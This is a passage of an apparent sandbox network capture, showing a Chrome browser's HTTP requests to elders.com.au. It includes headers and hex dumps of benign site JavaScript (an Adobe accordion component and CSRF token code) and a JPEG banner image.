                                                                                                                                    2024-11-05 08:03:26 UTC1369INData Raw: 65 63 75 74 65 28 22 72 65 6a 65 63 74 22 2c 61 72 67 75 6d 65 6e 74 73 29 7d 2c 5f 65 78 65 63 75 74 65 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 6e 75 6c 6c 3d 3d 3d 74 68 69 73 2e 5f 68 61 6e 64 6c 65 72 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 50 72 6f 6d 69 73 65 20 61 6c 72 65 61 64 79 20 63 6f 6d 70 6c 65 74 65 64 2e 22 29 3b 0a 66 6f 72 28 76 61 72 20 64 3d 30 2c 74 3d 74 68 69 73 2e 5f 68 61 6e 64 6c 65 72 2e 6c 65 6e 67 74 68 3b 64 3c 74 3b 64 2b 2b 29 74 68 69 73 2e 5f 68 61 6e 64 6c 65 72 5b 64 5d 5b 61 5d 2e 61 70 70 6c 79 28 77 69 6e 64 6f 77 2c 62 29 3b 74 68 69 73 2e 74 68 65 6e 3d 66 75 6e 63 74 69 6f 6e 28 75 2c 76 29 7b 28 22 72 65 73 6f 6c 76 65 22 3d 3d 3d 61 3f 75 3a 76 29 2e 61 70 70 6c 79 28 77 69 6e 64 6f 77 2c 62 29
                                                                                                                                    Data Ascii: ecute("reject",arguments)},_execute:function(a,b){if(null===this._handler)throw Error("Promise already completed.");for(var d=0,t=this._handler.length;d<t;d++)this._handler[d][a].apply(window,b);this.then=function(u,v){("resolve"===a?u:v).apply(window,b)
                                                                                                                                    2024-11-05 08:03:26 UTC191INData Raw: 65 20 74 6f 20 61 74 74 61 63 68 20 43 53 52 46 20 74 6f 6b 65 6e 20 74 6f 20 61 6e 20 69 66 72 61 6d 65 20 65 6c 65 6d 65 6e 74 20 6f 6e 20 74 68 65 20 73 61 6d 65 20 6f 72 69 67 69 6e 22 29 7d 72 65 74 75 72 6e 20 61 7d 7d 63 28 29 3b 73 65 74 49 6e 74 65 72 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 63 28 29 7d 2c 33 45 35 29 3b 72 65 74 75 72 6e 7b 69 6e 69 74 69 61 6c 69 73 65 64 3a 21 31 2c 72 65 66 72 65 73 68 54 6f 6b 65 6e 3a 63 2c 5f 63 6c 65 61 72 54 6f 6b 65 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 66 3d 76 6f 69 64 20 30 3b 63 28 29 7d 7d 7d 29 3b 0d 0a
                                                                                                                                    Data Ascii: e to attach CSRF token to an iframe element on the same origin")}return a}}c();setInterval(function(){c()},3E5);return{initialised:!1,refreshToken:c,_clearToken:function(){f=void 0;c()}}});
                                                                                                                                    2024-11-05 08:03:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    141192.168.2.449934162.159.140.344435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:26 UTC1051OUTGET /etc.clientlibs/el/clientlibs/clientlib-base.lc-e592021eafd59de123415ab937a09f08-lc.min.js HTTP/1.1
                                                                                                                                    Host: elders.com.au
                                                                                                                                    Connection: keep-alive
                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                    Accept: */*
                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                    Referer: https://elders.com.au/
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    Cookie: _clck=1d0trzd%7C2%7Cfqm%7C0%7C1770; AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CMCMID%7C55744627521858828850627066940577006981%7CMCAAMLH-1731398604%7C6%7CMCAAMB-1731398604%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730801004s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage; _fbp=fb.2.1730793804748.70395038985089435; affinity="14b7d00527153a43"
                                                                                                                                    2024-11-05 08:03:26 UTC628INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:26 GMT
                                                                                                                                    Content-Type: application/javascript;charset=utf-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                                    Cache-Control: public, max-age=2592000, immutable
                                                                                                                                    last-modified: Tue, 01 Oct 2024 13:06:01 GMT
                                                                                                                                    etag: W/"4748d-2386f26fb1bdc0-gzip"
                                                                                                                                    x-vhost: publish-elders
                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                    Age: 413695
                                                                                                                                    strict-transport-security: max-age=31557600
                                                                                                                                    x-served-by: cache-dfw-kdfw8210142-DFW
                                                                                                                                    x-cache: MISS
                                                                                                                                    x-timer: S1727787961.537213,VS0,VS0,VE1010
                                                                                                                                    vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8ddb53cabf994612-DFW
                                                                                                                                    2024-11-05 08:03:26 UTC741INData Raw: 37 64 32 61 0d 0a 2f 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 39 20 41 64 6f 62 65 0a 20 2a 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 41 70 61 63 68 65 20 4c 69 63 65 6e 73 65 2c 20 56 65 72 73 69 6f 6e 20 32 2e 30 20 28 74 68 65 20 22 4c 69 63 65 6e 73 65 22 29 3b 0a 20 2a 20 79 6f 75 20 6d 61 79 20 6e 6f 74 20 75 73 65 20 74 68 69 73 20 66 69 6c 65 20 65 78 63 65 70 74 20 69 6e 20 63 6f 6d 70 6c 69 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 4c 69 63 65 6e 73 65 2e 0a 20 2a 20 59 6f 75
                                                                                                                                    Data Ascii: 7d2a/******************************************************************************* * Copyright 2019 Adobe * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You
                                                                                                                                    2024-11-05 08:03:26 UTC1369INData Raw: 2a 2a 2a 2a 2a 2a 2f 0a 0a 2f 2a 2a 0a 20 2a 20 45 6c 65 6d 65 6e 74 2e 6d 61 74 63 68 65 73 28 29 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 64 65 76 65 6c 6f 70 65 72 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 65 6e 55 53 2f 64 6f 63 73 2f 57 65 62 2f 41 50 49 2f 45 6c 65 6d 65 6e 74 2f 6d 61 74 63 68 65 73 23 50 6f 6c 79 66 69 6c 6c 0a 20 2a 2f 0a 69 66 20 28 21 45 6c 65 6d 65 6e 74 2e 70 72 6f 74 6f 74 79 70 65 2e 6d 61 74 63 68 65 73 29 20 7b 0a 20 20 20 20 45 6c 65 6d 65 6e 74 2e 70 72 6f 74 6f 74 79 70 65 2e 6d 61 74 63 68 65 73 20 3d 20 45 6c 65 6d 65 6e 74 2e 70 72 6f 74 6f 74 79 70 65 2e 6d 73 4d 61 74 63 68 65 73 53 65 6c 65 63 74 6f 72 20 7c 7c 20 45 6c 65 6d 65 6e 74 2e 70 72 6f 74 6f 74 79 70 65 2e 77 65 62 6b 69 74 4d 61 74 63 68 65 73 53 65 6c 65 63
                                                                                                                                    Data Ascii: ******//** * Element.matches() * https://developer.mozilla.org/enUS/docs/Web/API/Element/matches#Polyfill */if (!Element.prototype.matches) { Element.prototype.matches = Element.prototype.msMatchesSelector || Element.prototype.webkitMatchesSelec
                                                                                                                                    2024-11-05 08:03:26 UTC1369INData Raw: 4b 49 4e 44 2c 20 65 69 74 68 65 72 20 65 78 70 72 65 73 73 20 6f 72 20 69 6d 70 6c 69 65 64 2e 0a 20 2a 20 53 65 65 20 74 68 65 20 4c 69 63 65 6e 73 65 20 66 6f 72 20 74 68 65 20 73 70 65 63 69 66 69 63 20 6c 61 6e 67 75 61 67 65 20 67 6f 76 65 72 6e 69 6e 67 20 70 65 72 6d 69 73 73 69 6f 6e 73 20 61 6e 64 0a 20 2a 20 6c 69 6d 69 74 61 74 69 6f 6e 73 20 75 6e 64 65 72 20 74 68 65 20 4c 69 63 65 6e 73 65 2e 0a 20 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2f 0a 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 0a 20 20 20
                                                                                                                                    Data Ascii: KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. ******************************************************************************/(function() { "use strict";
                                                                                                                                    2024-11-05 08:03:26 UTC1369INData Raw: 6e 65 6c 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 69 64 64 65 6e 3a 20 22 63 6d 70 2d 61 63 63 6f 72 64 69 6f 6e 5f 5f 70 61 6e 65 6c 2d 2d 68 69 64 64 65 6e 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 65 78 70 61 6e 64 65 64 3a 20 22 63 6d 70 2d 61 63 63 6f 72 64 69 6f 6e 5f 5f 70 61 6e 65 6c 2d 2d 65 78 70 61 6e 64 65 64 22 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 3b 0a 0a 20 20 20 20 76 61 72 20 64 61 74 61 41 74 74 72 69 62 75 74 65 73 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 69 74 65 6d 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 65 78 70 61 6e 64 65 64 3a 20 22 64 61 74 61 2d 63 6d 70 2d 65 78 70 61 6e 64 65 64 22 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 3b 0a 0a 20 20 20 20 76 61 72 20 70 72 6f 70 65 72 74 69 65 73 20 3d
                                                                                                                                    Data Ascii: nel: { hidden: "cmp-accordion__panel--hidden", expanded: "cmp-accordion__panel--expanded" } }; var dataAttributes = { item: { expanded: "data-cmp-expanded" } }; var properties =
                                                                                                                                    2024-11-05 08:03:26 UTC1369INData Raw: 20 20 20 2f 2a 2a 0a 20 20 20 20 20 20 20 20 20 2a 20 49 6e 69 74 69 61 6c 69 7a 65 73 20 74 68 65 20 41 63 63 6f 72 64 69 6f 6e 2e 0a 20 20 20 20 20 20 20 20 20 2a 0a 20 20 20 20 20 20 20 20 20 2a 20 40 70 72 69 76 61 74 65 0a 20 20 20 20 20 20 20 20 20 2a 20 40 70 61 72 61 6d 20 7b 41 63 63 6f 72 64 69 6f 6e 43 6f 6e 66 69 67 7d 20 63 6f 6e 66 69 67 20 54 68 65 20 41 63 63 6f 72 64 69 6f 6e 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 0a 20 20 20 20 20 20 20 20 20 2a 2f 0a 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 69 6e 69 74 28 63 6f 6e 66 69 67 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 68 61 74 2e 5f 63 6f 6e 66 69 67 20 3d 20 63 6f 6e 66 69 67 3b 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2f 20 70 72 65 76 65 6e 74 73 20 6d 75 6c 74
                                                                                                                                    Data Ascii: /** * Initializes the Accordion. * * @private * @param {AccordionConfig} config The Accordion configuration */ function init(config) { that._config = config; // prevents mult
                                                                                                                                    2024-11-05 08:03:26 UTC1369INData Raw: 20 20 20 20 20 20 73 63 72 6f 6c 6c 54 6f 44 65 65 70 4c 69 6e 6b 49 64 49 6e 41 63 63 6f 72 64 69 6f 6e 28 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 77 69 6e 64 6f 77 2e 47 72 61 6e 69 74 65 20 26 26 20 77 69 6e 64 6f 77 2e 47 72 61 6e 69 74 65 2e 61 75 74 68 6f 72 20 26 26 20 77 69 6e 64 6f 77 2e 47 72 61 6e 69 74 65 2e 61 75 74 68 6f 72 2e 4d 65 73 73 61 67 65 43 68 61 6e 6e 65 6c 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2a 20 45 64 69 74 6f 72 20 6d 65 73 73 61 67 65 20 68 61 6e 64 6c 69 6e 67 3a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2a 20 2d 20 73 75 62 73 63 72 69 62 65 20 74 6f 20 22 63 6d 70 2e 70
                                                                                                                                    Data Ascii: scrollToDeepLinkIdInAccordion(); } if (window.Granite && window.Granite.author && window.Granite.author.MessageChannel) { /* * Editor message handling: * - subscribe to "cmp.p
                                                                                                                                    2024-11-05 08:03:26 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 74 6f 67 67 6c 65 28 6d 65 73 73 61 67 65 2e 64 61 74 61 2e 69 6e 64 65 78 29 3b 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2f 2f 20 72 65 76 65 72 74 20 74 6f 20 74 68 65 20 63 6f 6e 66 69 67 75 72 65 64 20 73 74 61 74 65 2e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 68 61 74 2e 5f 70 72 6f 70 65 72 74 69 65 73 2e 73 69 6e 67 6c 65 45 78 70 61 6e 73 69 6f 6e 20 3d 20 73 69 6e 67 6c 65 45 78 70 61 6e 73 69 6f 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0a 20 20
                                                                                                                                    Data Ascii: toggle(message.data.index); // revert to the configured state. that._properties.singleExpansion = singleExpansion; } } });
                                                                                                                                    2024-11-05 08:03:26 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2f 2f 20 65 78 70 61 6e 64 20 74 68 65 20 61 63 63 6f 72 64 69 6f 6e 20 69 74 65 6d 20 63 6f 6e 74 61 69 6e 69 6e 67 20 74 68 65 20 64 65 65 70 20 6c 69 6e 6b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 65 74 49 74 65 6d 45 78 70 61 6e 64 65 64 28 64 65 65 70 4c 69 6e 6b 49 74 65 6d 2c 20 74 72 75 65 2c 20 74 72 75 65 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 68 61 73 68 49 64 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 2e 73 75 62 73 74 72 69 6e 67 28 31 29 3b 0a 20 20 20 20 20 20 20 20 20
                                                                                                                                    Data Ascii: } // expand the accordion item containing the deep link setItemExpanded(deepLinkItem, true, true); } var hashId = window.location.hash.substring(1);
                                                                                                                                    2024-11-05 08:03:26 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 76 61 72 20 6b 65 79 20 3d 20 68 6f 6f 6b 2e 64 61 74 61 73 65 74 5b 4e 53 20 2b 20 22 48 6f 6f 6b 22 20 2b 20 63 61 70 69 74 61 6c 69 7a 65 64 5d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 74 68 61 74 2e 5f 65 6c 65 6d 65 6e 74 73 5b 6b 65 79 5d 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 21 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 74 68 61 74 2e 5f 65 6c 65 6d 65 6e 74 73 5b 6b 65 79 5d 29 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 74 6d 70 20 3d 20 74 68 61 74 2e 5f 65 6c 65 6d 65 6e 74 73 5b 6b 65 79 5d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                    Data Ascii: var key = hook.dataset[NS + "Hook" + capitalized]; if (that._elements[key]) { if (!Array.isArray(that._elements[key])) { var tmp = that._elements[key];
                                                                                                                                    2024-11-05 08:03:26 UTC1369INData Raw: 20 20 20 20 20 20 20 69 66 20 28 76 61 6c 75 65 20 3d 3d 3d 20 6e 75 6c 6c 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2f 2f 20 76 61 6c 75 65 20 73 74 69 6c 6c 20 6e 75 6c 6c 2c 20 74 61 6b 65 20 74 68 65 20 70 72 6f 70 65 72 74 79 20 64 65 66 61 75 6c 74 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 6c 75 65 20 3d 20 70 72 6f 70 65 72 74 69 65 73 5b 6b 65 79 5d 5b 22 64 65 66 61 75 6c 74 22 5d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 68 61 74 2e 5f 70 72 6f 70 65 72 74 69 65 73 5b 6b 65 79 5d 20 3d 20 76 61 6c 75 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20
                                                                                                                                    Data Ascii: if (value === null) { // value still null, take the property default value = properties[key]["default"]; } that._properties[key] = value; }


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    142192.168.2.449935162.159.140.344435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:26 UTC1182OUTGET /content/dam/eld/images/homepage-banners/modern_home.jpg HTTP/1.1
                                                                                                                                    Host: elders.com.au
                                                                                                                                    Connection: keep-alive
                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                    Referer: https://elders.com.au/
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    Cookie: _clck=1d0trzd%7C2%7Cfqm%7C0%7C1770; AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CMCMID%7C55744627521858828850627066940577006981%7CMCAAMLH-1731398604%7C6%7CMCAAMB-1731398604%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730801004s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage; _fbp=fb.2.1730793804748.70395038985089435; affinity="14b7d00527153a43"; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F
                                                                                                                                    2024-11-05 08:03:27 UTC715INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:26 GMT
                                                                                                                                    Content-Type: image/jpeg
                                                                                                                                    Content-Length: 172833
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: public, max-age=86400, immutable
                                                                                                                                    Cf-Bgj: h2pri
                                                                                                                                    access-control-allow-origin: *
                                                                                                                                    content-disposition: attachment; filename="modern_home.jpg"; filename*=UTF-8''modern_home.jpg
                                                                                                                                    etag: "0x8DBB2D664B3FCD5"
                                                                                                                                    last-modified: Mon, 11 Sep 2023 14:50:08 GMT
                                                                                                                                    strict-transport-security: max-age=31557600
                                                                                                                                    x-cache: MISS
                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                                    x-served-by: cache-sjc10031-SJC
                                                                                                                                    x-timer: S1727421421.371306,VS0,VS0,VE1158
                                                                                                                                    x-vhost: publish-elders
                                                                                                                                    CF-Cache-Status: REVALIDATED
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8ddb53cb2eb3462c-DFW
                                                                                                                                    2024-11-05 08:03:27 UTC654INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 64 00 00 ff e1 03 8f 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 31 2d 63 30 30 31 20 37 39 2e 61 38 64 34 37 35 33 34 39 2c 20 32 30 32 33 2f 30 33 2f 32 33 2d 31 33 3a 30 35 3a 34 35 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46
                                                                                                                                    Data Ascii: ExifII*Duckydhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:45 "> <rdf:RDF
                                                                                                                                    2024-11-05 08:03:27 UTC1369INData Raw: 37 34 36 34 38 38 44 31 31 45 45 41 38 33 36 38 37 41 32 45 35 39 33 32 30 43 43 22 20 78 6d 70 3a 43 72 65 61 74 6f 72 54 6f 6f 6c 3d 22 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 34 2e 31 20 28 4d 61 63 69 6e 74 6f 73 68 29 22 3e 20 3c 78 6d 70 4d 4d 3a 44 65 72 69 76 65 64 46 72 6f 6d 20 73 74 52 65 66 3a 69 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 31 30 30 35 32 66 63 64 2d 36 35 36 33 2d 34 65 30 62 2d 38 62 32 34 2d 64 65 31 63 31 32 30 30 31 63 30 38 22 20 73 74 52 65 66 3a 64 6f 63 75 6d 65 6e 74 49 44 3d 22 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 31 62 38 37 33 34 33 38 2d 62 62 39 39 2d 30 32 34 61 2d 38 65 39 37 2d 39 38 37 37 37 61 38 66 62 33 36 66 22 2f 3e 20 3c 2f 72 64 66 3a 44 65 73 63 72
                                                                                                                                    Data Ascii: 746488D11EEA83687A2E59320CC" xmp:CreatorTool="Adobe Photoshop 24.1 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:10052fcd-6563-4e0b-8b24-de1c12001c08" stRef:documentID="adobe:docid:photoshop:1b873438-bb99-024a-8e97-98777a8fb36f"/> </rdf:Descr
                                                                                                                                    2024-11-05 08:03:27 UTC1369INData Raw: 51 a2 8a 34 51 46 8a 28 d1 45 1a 28 a3 45 14 68 a2 8d 14 51 a2 8a 34 51 46 8a 28 d1 45 1a 28 a3 45 14 68 a2 8d 14 51 a2 8a 34 51 46 8a 28 d1 45 1a 28 a3 45 14 68 a2 8d 14 51 a2 8a 34 51 46 8a 28 d1 45 1a 28 a3 45 14 68 a2 8d 14 51 a2 8a 34 51 46 8a 28 d1 45 1a 28 a3 45 14 68 a2 8d 14 51 a2 8a 34 51 46 8a 28 d1 45 1a 28 a3 45 14 68 a2 8d 14 51 a2 8a 34 51 46 8a 28 d1 45 1a 28 a3 45 14 68 a2 8d 14 51 a2 8a 34 51 46 8a 28 d1 45 1a 28 a3 45 14 68 a2 8d 14 51 a2 8a 34 51 46 8a 28 d1 45 1a 28 a3 45 14 68 a2 8d 14 51 a2 8a 34 51 46 8a 28 d1 45 1a 28 a3 45 14 68 a2 8d 14 51 a2 8a 34 51 46 8a 28 d1 45 1a 28 a3 45 14 68 a2 8d 14 51 a2 8a 34 51 46 8a 28 d1 45 1a 28 a3 45 14 68 a2 8d 14 51 a2 8a 34 51 46 8a 28 d1 45 1a 28 a3 45 14 68 a2 8d 14 51 a2 8a 34 51 46 8a 28
                                                                                                                                    Data Ascii: Q4QF(E(EhQ4QF(E(EhQ4QF(E(EhQ4QF(E(EhQ4QF(E(EhQ4QF(E(EhQ4QF(E(EhQ4QF(E(EhQ4QF(E(EhQ4QF(E(EhQ4QF(E(EhQ4QF(E(EhQ4QF(E(EhQ4QF(
                                                                                                                                    2024-11-05 08:03:27 UTC1369INData Raw: 1a 28 a3 45 14 68 a2 8d 14 51 a2 8a 34 51 46 8a 28 d1 45 1a 28 a3 45 14 68 a2 8d 14 51 a2 8a 34 51 46 8a 28 d1 45 1a 28 a3 45 14 68 a2 8d 14 51 a2 8a 34 51 46 8a 28 d1 45 1a 28 ac 69 b3 61 db 61 cb b8 dc 65 c6 81 6f 81 19 f9 b3 a7 4d 7d a8 b0 e1 43 8a d2 9f 93 2e 5c 97 d6 86 63 c6 8e ca 14 b7 1c 5a 82 50 90 49 20 0d 19 e0 33 a2 bc 95 fe ad 1f e2 4e e3 ee 0e 8f 71 e1 3f 65 57 46 33 7e 46 bc 99 36 58 fc a9 68 87 12 fe ed c6 7a 83 91 d5 1b 84 b1 d9 8c ca 81 7e 4b 6f 25 5b f2 eb b3 2a c7 58 4b 7b a0 b1 76 f2 25 c6 6f 21 db a0 b3 8c 5d ee e4 b5 a4 2b 62 1f ca 3f 91 3f 78 c3 f7 c7 3e 00 ad 43 ef 67 ba 94 da 6d ad d7 71 91 72 12 c6 9e 58 62 e7 0f bd 18 0f a4 e0 84 57 8c 9c 8b 0a e4 af 72 72 b2 9e 6c f7 49 94 5d f2 9b ed c3 25 76 e4 d6 0a e5 fe e9 7b b4 b7 79 91
                                                                                                                                    Data Ascii: (EhQ4QF(E(EhQ4QF(E(EhQ4QF(E(iaaeoM}C.\cZPI 3Nq?eWF3~F6Xhz~Ko%[*XK{v%o!]+b??x>CgmqrXbWrrlI]%v{y
